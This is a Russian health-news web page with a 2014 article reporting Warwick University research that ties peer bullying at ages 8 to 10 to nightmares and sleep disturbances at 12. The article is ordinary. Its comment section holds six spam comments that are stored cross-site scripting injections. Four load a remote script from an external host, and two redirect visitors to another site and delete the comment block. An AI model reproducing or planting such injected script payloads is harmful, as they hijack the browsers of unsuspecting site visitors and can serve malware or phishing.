Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Страшные сны у ребенка – ...  >>  Страшные сны у ребенка – признак того, что его обижают в школе! Что делать?
 
Обратная связь
 

Страшные сны у ребенка – признак того, что его обижают в школе! Что делать?

Размер шрифта
27 ноября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Дети, над которыми издеваются их ровесники, получают серьезную психологическую травму, которая может привести к тревожным расстройствам, депрессии и даже попытке самоубийства. Однако ученым удалось найти способ распознавать эти проявления на ранней стадии, когда их можно довольно легко предотвратить.

Согласно данным, представленным на конференции общества педиатров в Ванкувере, существует способ выявления тех детей, которые подвергаются насилию со стороны сверстников, до того, как у них возникнут серьезные психологические проблемы. Ученые из Университета Вэрвика в Англии выяснили, что ночные кошмары и внезапные пробуждения чаще встречаются у 12-летних детей, над которыми издевались в возрасте 8-10 лет.

«Ночные кошмары – довольно распространенное явление в детском возрасте, а внезапные ночные пробуждения наблюдаются примерно у 10% детей», – рассказывает Сюзет Лерея из Университета Варвика. «Однако если они возникают часто или в течение длительного времени, это говорит о том, что ребенок подвергается насилию со стороны сверстников. Такие нарушения сна свидетельствуют об эмоциональном стрессе». 

В исследовании приняли участие 6 438 детей. Они были опрошены в возрасте 8 и 10 лет на предмет их отношений с ровесниками, а в 12-летнем возрасте были обследованы для выявления нарушений сна, ночных кошмаров и лунатизма. Результаты эксперимента показали, что в 12 лет у 1 555 детей (24,2%) были ночные кошмары, у 598 (9.3%) наблюдались внезапные ночные пробуждения, а у 814 (12.6%) был выявлен лунатизм.

Затем были исключены все посторонние факторы, такие как психические расстройства, различные зависимости, домашнее насилие и некоторые другие. Оказалось, что дети, которые были жертвами насилия в возрасте 8-10 лет, значительно чаще имели нарушения сна (ночные кошмары, внезапные пробуждения, лунатизм) в 12 лет. В то же время риск развития расстройств сна не был повышен у тех, кто сам издевался над другими детьми.

«Наша работа показала, что издевательство со стороны сверстников – это серьезная психологическая травма, причина высокого риска развития нарушений сна, таких как, например, ночные кошмары», – объясняет доктор Вольке, профессор психологии из Университета Варвика. «Родители должны понимать, что такие проблемы со сном могут быть связаны с тем, что их ребенка регулярно обижают; в этом случае они смогут поговорить об этом с ребенком и попробовать найти выход из сложившейся ситуации».

Так что обязательно обращайте внимание на сон вашего ребенка, ведь его ночные кошмары могут быть вызваны не только просмотром фильма ужасов, но и серьезными эмоциональными проблемами.

Множество других полезных материалов для идеальных родителей вы без труда найдете на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 18:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:24

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

6 - zzzzzz

30 июня 2015 в 22:24

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Храпящие люди в 3 раза чаще разбиваются на машинах! Как этого избежать   Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов   С какого возраста малышам можно давать иммуномодуляторы?  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
В какой позе спать, чтобы проснуться?
Ждете ребенка? Приготовьте дом
Можно ли пережить беременность без рвоты?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.